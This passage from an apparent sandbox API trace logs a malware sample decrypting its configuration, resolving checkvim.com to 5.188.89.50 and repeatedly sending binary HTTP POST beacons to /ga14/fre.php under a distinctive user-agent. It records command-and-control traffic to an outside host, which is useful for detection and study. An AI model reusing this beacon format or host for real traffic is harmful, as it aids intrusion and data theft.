param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0273.405] GetProcessHeap () returned 0x840000 [0273.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0273.405] GetProcessHeap () returned 0x840000 [0273.405] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0273.405] GetProcessHeap () returned 0x840000 [0273.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0273.405] GetProcessHeap () returned 0x840000 [0273.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0273.406] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0273.407] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0273.407] GetProcessHeap () returned 0x840000 [0273.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0273.407] GetProcessHeap () returned 0x840000 [0273.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0273.407] send (s=0x410, buf=0x873a58*, len=237, flags=0) returned 237 [0273.408] send (s=0x410, buf=0x87eb58*, len=159, flags=0) returned 159 [0273.408] GetProcessHeap () returned 0x840000 [0273.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0273.408] recv (in: s=0x410, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0273.760] GetProcessHeap () returned 0x840000 [0273.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0273.760] GetProcessHeap () returned 0x840000 [0273.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0273.760] GetProcessHeap () returned 0x840000 [0273.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0273.760] GetProcessHeap () returned 0x840000 [0273.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0273.760] closesocket (s=0x410) returned 0 [0273.761] GetProcessHeap () returned 0x840000 [0273.761] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0273.761] GetProcessHeap () returned 0x840000 [0273.761] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0273.761] GetProcessHeap () returned 0x840000 [0273.761] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0273.761] GetProcessHeap () returned 0x840000 [0273.761] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0273.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x4cc) returned 0x410 [0273.763] Sleep (dwMilliseconds=0xea60) [0273.764] GetProcessHeap () returned 0x840000 [0273.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0273.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.765] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0273.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.771] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0273.781] GetProcessHeap () returned 0x840000 [0273.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0273.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.782] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8b0) returned 1 [0273.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.783] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0273.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.784] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.784] GetProcessHeap () returned 0x840000 [0273.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0273.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.785] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0273.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.786] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0273.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.787] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0273.787] GetProcessHeap () returned 0x840000 [0273.787] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0273.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.791] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.791] GetProcessHeap () returned 0x840000 [0273.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0273.791] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0273.792] GetProcessHeap () returned 0x840000 [0273.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0273.792] GetProcessHeap () returned 0x840000 [0273.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0273.792] GetProcessHeap () returned 0x840000 [0273.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0273.792] GetProcessHeap () returned 0x840000 [0273.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0273.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.793] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0273.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.801] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0273.807] GetProcessHeap () returned 0x840000 [0273.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0273.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.807] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0273.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.808] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0273.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.809] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.809] GetProcessHeap () returned 0x840000 [0273.809] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0273.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.810] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0273.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.811] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0273.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0273.812] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0273.812] GetProcessHeap () returned 0x840000 [0273.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0273.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.813] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0273.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.814] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0273.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.815] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0273.815] GetProcessHeap () returned 0x840000 [0273.815] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0273.815] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0273.816] GetProcessHeap () returned 0x840000 [0273.817] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0273.817] socket (af=2, type=1, protocol=6) returned 0x414 [0273.817] connect (s=0x414, name=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0273.889] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0273.889] GetProcessHeap () returned 0x840000 [0273.889] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0273.889] GetProcessHeap () returned 0x840000 [0273.889] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0273.890] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0273.891] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0273.891] GetProcessHeap () returned 0x840000 [0273.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0273.891] GetProcessHeap () returned 0x840000 [0273.891] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0273.891] GetProcessHeap () returned 0x840000 [0273.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0273.891] GetProcessHeap () returned 0x840000 [0273.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0273.892] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0273.892] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0273.892] GetProcessHeap () returned 0x840000 [0273.892] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0273.893] GetProcessHeap () returned 0x840000 [0273.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0273.893] send (s=0x414, buf=0x873a58*, len=237, flags=0) returned 237 [0273.893] send (s=0x414, buf=0x87eb58*, len=159, flags=0) returned 159 [0273.893] GetProcessHeap () returned 0x840000 [0273.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0273.893] recv (in: s=0x414, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0274.267] GetProcessHeap () returned 0x840000 [0274.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0274.267] GetProcessHeap () returned 0x840000 [0274.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0274.267] GetProcessHeap () returned 0x840000 [0274.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0274.267] GetProcessHeap () returned 0x840000 [0274.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0274.268] closesocket (s=0x414) returned 0 [0274.268] GetProcessHeap () returned 0x840000 [0274.268] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0274.268] GetProcessHeap () returned 0x840000 [0274.268] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0274.268] GetProcessHeap () returned 0x840000 [0274.268] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0274.268] GetProcessHeap () returned 0x840000 [0274.268] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0274.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x58c) returned 0x414 [0274.270] Sleep (dwMilliseconds=0xea60) [0274.302] GetProcessHeap () returned 0x840000 [0274.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0274.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.304] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0274.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.311] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0274.317] GetProcessHeap () returned 0x840000 [0274.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0274.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.318] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0274.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.319] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0274.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.320] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.320] GetProcessHeap () returned 0x840000 [0274.320] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0274.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.345] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0274.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.346] CryptDestroyKey (hKey=0x87e270) returned 1 [0274.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.347] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0274.347] GetProcessHeap () returned 0x840000 [0274.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0274.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.349] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.350] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.352] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.354] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.354] GetProcessHeap () returned 0x840000 [0274.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0274.354] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0274.354] GetProcessHeap () returned 0x840000 [0274.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0274.354] GetProcessHeap () returned 0x840000 [0274.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0274.354] GetProcessHeap () returned 0x840000 [0274.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0274.354] GetProcessHeap () returned 0x840000 [0274.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0274.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.356] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0274.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.363] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0274.370] GetProcessHeap () returned 0x840000 [0274.370] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0274.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.372] CryptImportKey (in: hProv=0x86fb50, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0274.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.373] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0274.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.374] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.374] GetProcessHeap () returned 0x840000 [0274.374] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0274.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.375] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0274.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.376] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0274.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0274.377] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0274.377] GetProcessHeap () returned 0x840000 [0274.377] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0274.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.378] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0274.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.381] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0274.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.397] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0274.397] GetProcessHeap () returned 0x840000 [0274.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0274.397] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0274.399] GetProcessHeap () returned 0x840000 [0274.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0274.399] socket (af=2, type=1, protocol=6) returned 0x418 [0274.399] connect (s=0x418, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0274.498] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0274.498] GetProcessHeap () returned 0x840000 [0274.498] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0274.499] GetProcessHeap () returned 0x840000 [0274.499] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0274.499] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0274.501] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0274.501] GetProcessHeap () returned 0x840000 [0274.501] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0274.501] GetProcessHeap () returned 0x840000 [0274.501] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0274.501] GetProcessHeap () returned 0x840000 [0274.501] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0274.501] GetProcessHeap () returned 0x840000 [0274.501] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0274.502] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0274.503] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0274.503] GetProcessHeap () returned 0x840000 [0274.503] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0274.503] GetProcessHeap () returned 0x840000 [0274.503] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0274.503] send 